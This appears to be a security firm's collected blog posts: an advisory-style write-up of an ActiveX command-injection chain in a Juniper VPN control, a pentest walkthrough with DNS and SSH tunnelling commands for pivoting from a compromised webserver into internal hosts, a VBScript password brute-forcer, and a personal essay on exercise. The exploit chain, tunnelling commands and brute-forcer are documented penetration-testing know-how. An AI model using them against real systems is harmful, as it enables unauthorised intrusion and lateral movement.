Earlier this week we had an internal presentation on Attacking ActiveX Controls. The main reason we had it is because of the ridiculously high hit rate we have whenever we look at controls with a slight security bent.. When building the presentation i dug up an old advisory we never publicly released (obviously we reported it to the vendor who (kinda) promptly fixed the bug (without giving us any credit at all, but hey.. )) While the IEBlog promises updates to IE8 that will minimize the damage caused by owned controls in the future, the fundamental problems with ActiveX today are an attackers dream.

• Developers still write controls as if only they can invoke its methods (repurposing++),
• The fact that Skylined's HeapSpraying and Alex Sotirovs Heap Feng Shui makes the browser such a comfortable exploiting environment means that memory corruption bugs in a control == trivial to write client side exploits.

This blog post is not about fuzzing the hell out of a control or even about comfortable memory corruption inside a modern browser.. Instead its about the bugs you will never find with static analysis (and statistically will never find with fuzzing). You occasionally have a customer asking if an application needs to be assessed if the customer has already used some sort of static analysis tool. Of course answering this is tricky since we do application assessments for a living and my honest answer must seem at least slightly tainted.. For me the attached bug we found in a Juniper ActiveX control covers my point of view perfectly..

The Background:

The Juniper SSL-VPN products make use of an ActiveX Control on the client-side. Previously bugs had been found in the control by eEye and had been subsequently fixed by Juniper. This was a pretty garden variety stack smash and it would appear that Juniper did the right thing and hunted down other instances of these bugs within the control.

The Bug(s):

The ActiveX control included the functionality to upgrade itself if the server informed it of a new software version. By simply instantiating the control and passing it a high build number and a URL path to a downloadable file, we could cause the client to download our (possibly malicious) file.

(click here to enlarge) This was a pretty obvious attack though, and the Control first checked the downloaded file to see if it was signed by Juniper. If it wasnt, then the file was not executed. Drat!

The kicker though.. was that this file was not deleted, and was always downloaded to a predictable spot. (C:\predictable_location)

Interlude: Now.. the usual attack vectors dont really come through for us.. We cant over-write anything important with this file and simply filling the disk seems pointless.

Bug (Continues):

When instantiating the control, one of the parameters we can pass is the path to the control's .ini configuration file:

(click to enlarge) Now..  We can drop an arb file to the victims machine && we can instantiate the control using any well formed config file on his machine.. hmmm..

(click to enlarge)

Now, in case you dont see it, the config file above has the winning line: UninstallString="calc.exe &&"

So.. the writing is on the wall and the full process is this:

1. Client with control visits malicious page.
2. Page instantiates control and offers an upgrade 
   
   (click to enlarge)
3. new-config.txt downloads to c:\predictable_location\new-config.txt
4. Malicious page re-instantiates control with ini file == c:\predictable_location\new-config.txt [new-config contains arbitrary commands as uninstall string]
5. We use the controls uninstall method:
   
   (click to enlarge)
6. The victims machine fires calc.exe && and the game is over..

Conclusion:

Ok.. so the simple deal is.. that much like the eEye find, client visits page and client gets arb. code executed on his machine, but (and this was the point of this whole rant) bugs like this have always been considered "less sexy" than stack smashes. Whats far more important for me however, is that even if our static analysis tools get to the state where they match their marketing hype, they will never find a bug like this..

There are some things that computers are good at, and some things that humans are.. and just because we want this to be a problem thats solvable with technology doesnt mean that the technology to do it will ever exist. This obviously does not mean that such tools are useless, just that they will never be a silver bullet, and that its still difficult to beat a trained set of eyes with high criminal energy..

/mh

On a recent assessment we came across the following scenario:

1) We have command execution through a web command interpreter script (cmd.jsp) on a remote Linux webserver 2) The box is firewalled only allowing 53 UDP ingress and egress

3) The box is sitting on the network perimeter, with one public IP and one internal IP, and not in a DMZ So we want to tunnel from the SensePost offices to Target Company's internal machines, with this pretty restrictive setup. How did we accomplish this?

1) Upload and compile dns2tcp to the target machine

2) Create a dns2tcp tunnel from target (dns2tcp client) to SPDNSTUNNEL (dns2tcp server)

• SPDNSTUNNEL is running a dns2tcp server offering two services, ssh and proxy. The dns2tcp client can connect from target to SPDNSTUNNEL's ssh or proxy ports over its 'TCP' channel. This is done with the following command, where we setup target to listen locally on 55555:

• ./dns2tcpc -z mooo.mooo.moooo -r ssh -l 55555 SPDNSTUNNEL.sensepost.com
• (Creating Target:55555 ---TCP/53---> SPDNSTUNNEL:sshPort).

3) Create an SSH tunnel from target to SPDNSTUNNEL, forwarding traffic from SPDNSTUNNEL through target to internal network

• Since we have a non interactive shell on the webserver we needed to create this tunnel with a single command with no prompts. We created a dummy user on SPDNSTUNNEL and created ssh keys for it. We uploaded the ssh keys to target and issuing the following command through an uploaded bashscript ssh-ed into SPDNSTUNNEL through the DNS tunnel:
• ssh -i /tmp/key -p 55555 -l tunnelUser-R 4444:intranetserver.target.com:80 -o "stricthostkeychecking=no" 127.0.0.1

4) What do we have now? We have SPDNSTUNNEL listening on 4444. Connections made to SPDNSTUNNEL on 4444 will connect to intranetserver.target.com on port 80. So the final step is to create tunnel from our assessment laptop, to SPDNSTUNNEL's 4444, allowing us to connect to the target's internal network from the comfort of our SensePost pods:

• Linux :: [glenn@localhost] ssh -L 3333:localhost:4444 SPDNSTUNNEL.sensepost.com -l glenn
• Windows :: Use putty's ssh tunnel option, setting "Source port" to 3333 and destination to "localhost:4444

5) Now, if we want to connect to different target internal machine what do we need to do with the above London Underground of tunnels? We need only to change the exit point on the compromised target machine's tunnel, all the other tunnels stay intact. So we leave the DNS tunnel in place, and tear down the SSH tunnel executing the following on SPDNSTUNNEL:

• ps auux | grep ssh | egrep '^tunnelUser' | cut -f 3 -d " " | xargs kill ; clear ; tail -f /var/log/secure
• (tailing /var/log/secure is useful, upon executing the ssh command on target we should see a connect from tunnelUser)

..and create a new ssh tunnel by executing a modified .sh script with the following in it from the target machine:

• ssh -i /tmp/key -p 55555 -l tunnelUser-R 4444:CEO_laptop.target.com:139 -o "stricthostkeychecking=no" 127.0.0.1

As you see the only change in the whole setup is the internal target machine and point in this one command. We can now connect to the CEO's laptop's samba share by smbclient-ing to our assessment laptop on port 3333.

See the attached picture for a summary of the above.

-Glenn

I think the ian-mangler hack is awesome, and the fact that it got the results needed means it was a full-on victory.. its really interesting, because fairly recently i had a discussion with one of the XXXX guys on what makes rocking analysts rock, and amongst other things it became apparant (if it was not already obvious) that great analysts can smack together the tool chain they need to handle the edge cases.. i recall way back when "YYYYYY" said "im a leet hax0r except i dont know programming or networking".. sadly he wasnt joking...

its ok if you cant throw ians app together with a fancy gui, or if u take 3 times as long as he did.. but all of you should be looking at this and thinking - in a pinch, i could have made an ugly variation of that with [python|perl|java|bash+nc+sed|or heaven forbid even ruby]

Of course, one of the things we preach in in Hacking By Numbers is also about knowing available tools... so for an informal Friday Question of the "Some time Period"... What tool could have been used, fresh outa the box to achieve the same result ?

/mh

When we first wrote the vbscripting bruteforcer i thought it was marginally cute and a real last shot type of tool. In the past 2 months its saved our ass twice so i thought id post it again..

The situation.. Uninstalling Pointsec from our machines.. the install needs 2 admin passwords (spadmin1 && spadmin2).

The 2 guys who managed the rollout seem to recall that the passwords were Aaaaaa69Bbbb69Ccccccc (or some variation of it) for spadmin1 and Xxxxxxx69Yyyyyy69Zzzzzzz (or some variation of it). (variation could be uppercase, lowercase, 68 instead of 69, camelcaps) all of this in an unpredictable permutation.. ie.. cld be aaaaaa69bbbb69ccccc && Xxxx68Yyyy68Zzzz.

Clearly this is perfect for automation.. and perfect for my lame vbs scripting trick..

So.. i mangled the ffg script:

-snip-

‘Quick and Dirty .vbs bruteforcer
‘haroon@sensepost.com
Dim objFSO, objTS, s, aFile
Set objFSO = CreateObject(”Scripting.FileSystemObject”)
Set objTS = objFSO.OpenTextFile(”words.txt”)
‘Now, read the contents of the file into a string
s = objTS.ReadAll
‘Now, use split to load the contents of the file into an array
aFile = split(s, vbCrLf)
bFile = aFile
Msgbox “Passwords Loaded..”,,”Dirty Script”
set WshShell = CreateObject(”WScript.Shell”)
For Each pass in aFile
For Each pass2 in bFile
Msgbox “pass1 = ” & pass & vbCRLF & “pass2 = ” & pass2
‘Bring the application to the foreground
WshShell.AppActivate “InstallShield Wizard - Pointsec Uninstallation”
WScript.Sleep 200
While WshShell.AppActivate(”InstallShield Wizard - Pointsec Uninstallation”) = FALSE
wscript.sleep 1000
Wend
’send tab
WshShell.SendKeys “{TAB}”
WshShell.SendKeys pass
WshShell.SendKeys “{TAB}”
WshShell.SendKeys “{TAB}”
WshShell.SendKeys pass2
WshShell.SendKeys “{TAB}”
WshShell.SendKeys “{ENTER}”
wscript.sleep 1000
if WshShell.AppActivate(”Pointsec : Error”) = True then
WshShell.SendKeys “{ENTER}”
Else
Msgbox “Password1 = ” & pass  &vbCRLF & “Password2 = ” & pass2,,”Gotcha!!!”
wscript.quit
End if
Next
Next
-snip-

The result.. about 4 seconds from click to success! :>

" Then it loops….

" Till finally…

"

Like i mentioned previously.. the thing that makes it cool is that it abstracts the underlying complexity.. i dont need protocol dumps / traffic analysis to brute a strange server.. i just need their own client.. my vbs might totally suck, and is probably super inefficient.. and since ive used this excuse before, its prolly time to get a decent .vbs book :>

/mh

This came up during discussions today and i found it fortuitous to catch it on "Raganwald"s blog tonight:

"I can change any time I want to, I just don't want to.

Does that sound like anything you've heard before? Perhaps from a smoker? Or someone who does not exercise?

Or maybe someone who says they could learn new things, but they are too busy right now keeping on top of what they already know? Or the converse? Someone who is too busy playing with new things to buckle down and work hard with what they already know?

Change is brutally hard. Nobody finds it easy."

This has been a pet peeve of mine from long before i even knew that peeves made good pets... on that completely ridiculous note, i will now proceed to rant..

Back when i as in University i was an absolute sports nut.. i never watched or spectated much, but i played everything! Organized football more than 3 times a week, Gym at least 5 nights a week, Squash in between and once managed to even compete in a Triathlon. At the time, i was amazed (and mildly annoyed) by pot-bellied aquaintences who would mention how "they just dont have time to exercise". You hear the excuse from lots of people. My brother in-law used to tell me "you can do that while you are single, but it changes when you marry". I know marriage brings new compromises so i took his word for it.. 3 years into my marriage i noticed i was still gyming and squashing, but then he said "you can do that as a young couple.. but not when you have kids.. ".. i think i start to see a pattern here..

If anyone knows me, they would probably know that i read a fair bit.. Deels and i often spend the better part of a Saturday or Sunday sipping coffee and reading. I am often told however that this is a luxury afforded me because [we dont have kids|my job encourages it|insert reason here].. i think the pattern is obvious..

*Quick almost pointless interlude* About 2 months ago during pretty regular conversation Deels asked me "Did you ever think you would grow up to become unfit?" The words literally shook me to my core. One of the problems i suspect most males have is that we kinda form a body image in university and keep it in our heads despite all evidence to the contrary.. Interestingly to soothe the sting of her (honestly innocent) comment, i almost said "i just dont have the time.."

I honestly believe that you can make time for anything.. When you say you dont have the time, what you really should be saying is "i dont really want to spend time doing _that_ right now". There is nothing wrong with this.. I was prepared to spend more time on physical activity in my teenage years than i am now.. Its a choice i make but the different phrasing holds a world of difference. One lays the "blame" for my rounder figure squarely at my feet, while the other makes excuses for my choice and looks for some other scapegoat..

You dont have time to read? Why? i manage to find the time every day.. oh.. i dont watch TV and generally sleep <= 5 hours a night at most.. "but i need my 8 hours!".. no.. you choose your 8 hours.. and this isn't bad.. but it _is_ your choice..

We have interviewed people in the past who mentioned how they havnt read infosec / technical material for a bit because [they were tired|they were...].. i call bull#@$@ They haven't because they made different choices.. Again.. im not judging the choices either way, im just saying that one shouldnt externalise the reasons for the choices one makes..

If you have been sitting on an excuse like this, ill end with something i read recently in a Tom Peters book. He said something to the effect of "Making a change is easy.. its actually easier than you think.. its maintaining the change thats hard.. Want to start exercise? Just do it.. Go for a run right now.. The change is made.. Whether or not you maintain it will require a different skill, but the change has been made"

/mh

PS.. sorry for the long blog hiatus - i have just been too busy to blog! PPS. Been hitting the gym again regularly for the past month, and Bradley and i make sure we get in our once a week squash :>>